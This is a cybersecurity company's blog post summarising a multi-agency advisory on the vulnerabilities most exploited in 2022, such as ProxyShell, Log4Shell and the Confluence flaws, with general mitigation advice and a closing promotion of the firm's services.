Top Vulnerabilities Exploited By Cybercriminals

cybersecurity support service

The year 2022 saw cybercriminals targeting unpatched, internet-facing systems and older software vulnerabilities. The criminals seem to have exploited the publicly available Proof of Concept (PoC) code. The success of such actors appears to be more in exploiting known vulnerabilities within the first two years of their disclosure. This is due to the fact that as the software is patched or upgraded, the value of any existing vulnerability decreases. This is why timely patching of software applications helps reduce the effectiveness of vulnerabilities.

According to Ravin Prasad, CEO of Cybernetic Global Intelligence, a globally accredited cybersecurity support service, patching helps decrease the pace of hacking by cybercriminals and forces them to pursue more time-consuming and costly methods. These may include conducting software supply chain operations or developing zero-day exploits.

It is common knowledge that malicious threat actors usually prioritise exploiting globally prevalent vulnerabilities. They also develop tools to exploit other widespread, critical, and publicly known vulnerabilities. Further, cybercriminals give higher priority to vulnerabilities prevalent in their target’s networks. With multiple CVEs, cybercriminals send a malicious web request comprising unique signatures, which can only be detected using deep packet inspection. To counter all these, a host of cybersecurity agencies coauthorized and issued a joint advisory. These agencies include the following:

  • Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) from the USA.
  • The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
  • Canadian Centre for Cyber Security (CCCS)
  • New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand
  • National Cyber Security Centre

What Are the Top Exploited Vulnerabilities?

The top vulnerabilities that were routinely exploited by cybercriminals in 2022 include:

CVE-2018-13379: Affecting Fortinet SSL VPNs, this particular vulnerability was exploited routinely in 2020 and 2021. These incidences showed that most organisations were vulnerable to cybercriminals as they did not patch their software applications in a timely manner.

CVE-2021-34473, CVE 2021-31207, and CVE 2021-34523: These ProxyShell vulnerabilities impact Microsoft Exchange email servers. Together, their effective exploitation gives a distant actor the ability to run any code. The Microsoft Client Access Service (CAS), which commonly operates on port 443 in Microsoft Internet Information Services (IIS), is where these flaws are located. To enable users to access their email through mobile devices and web browsers, CAS is frequently exposed to the internet.

CVE-2021-40539: It enables cybercriminals to execute remote code execution in Zoho ManageEngine ADSelfService Plus and was linked to the use of an outdated third-party dependency. The vulnerability was exploited in late 2021 and continued to be exploited throughout 2022.

CVE-2021-26084: It affects Altassian Confluence Servicer and Data Center, a web-based tool used by governments and private companies. It has the ability to enable any cybercriminal to run arbitrary code on vulnerable systems. This particular vulnerability turned out to be one of the most exploited after a PoC was released within a week of its eventual disclosure. This vulnerability was exploited en masse by cybercriminals in September 2021.

CVE-2021-44228: Known as Log4Shell, this vulnerability affects Apache’s Log4j library, which is an open-source logging framework that forms part of several products. A cybercriminal exploits this particular vulnerability by submitting a request to a vulnerable system, leading to the execution of arbitrary code. The request allows the cybercriminal to assume control of a system, thereby allowing him or her to steal information, run ransomware, or conduct any other malicious activity. This vulnerability began to be misused after it was disclosed in December 2021, and continued unabated through the first half of 2022.

CVE-2022-22954, CVE-2022-22960: The string of vulnerabilities allows privilege escalation, RCE, and authentication bypass in VMware products. With these, any cybercriminal can trigger a server-side template injection, resulting in remote code execution. Exploitation of these vulnerabilities began in early 2022 and continued throughout the year.

CVE-2022-1388: It enables a cybercriminal to bypass iControl REST authentication on F5 BIG-IP security software.

CVE-2022-30190: This particular vulnerability has an impact on the Microsoft Support Diagnostic Tool in Windows. And any cybercriminal can exploit it to assume control of an affected system.

CVE-2022-26134: This vulnerability affects Atlassian Confluence and Data Centre and was publicly disclosed in June 2022. It follows an older Confluence Vulnerability (CVE-2021-26084), which was exploited by cybercriminals in 2022.

Note: In addition to the above, you may read our blog to know about more dangerous vulnerabilities in 2023.

How to Mitigate These Vulnerabilities

The string of recommendations or advisories given by the consulting cybersecurity agencies to mitigate CVE vulnerabilities for every stakeholder is as follows:

  • Identify routinely exploited classes of vulnerabilities.
  • Identify the root cause of the vulnerabilities to find out if there are any design flaws.
  • Implement suitable mitigations to eliminate the vulnerabilities.
  • Implement secure design practices at each stage of the SDLC.
  • Enhance product security by eliminating default passwords and making additional configuration changes.
  • Implement a centralised patch management system.
  • Use tools such as endpoint detection and response, network protocol analysers, and web application firewalls.
  • Allow business leaders to take proactive steps and become security stakeholders.
  • Update operating systems, software applications, and firmware in a timely manner.
  • Replace any end-of-life software that is not supported by the vendor.
  • Perform automated asset discovery routinely to identify and catalogue systems, hardware, and software.
  • Perform secure system backups.
  • Implement a phishing-resistant multifactor authentication procedure for all users.
  • Review, validate, or eliminate privileged accounts.
  • Configure and secure all internet-facing devices, encrypt network traffic, and disable unnecessary ports and protocols.

Conclusion

In addition to the above-mentioned mitigation activities, you can hire the services of a globally accredited cybersecurity company, such as Cybernetic Global Intelligence. Cybersecurity professionals can perform a comprehensive review of your digital assets and suggest remedies. For details, call us at 1300 292 376, send an email to Contact@cybernetic-gi.com, or visit www.cybernetic-gi.com.

Post a Comment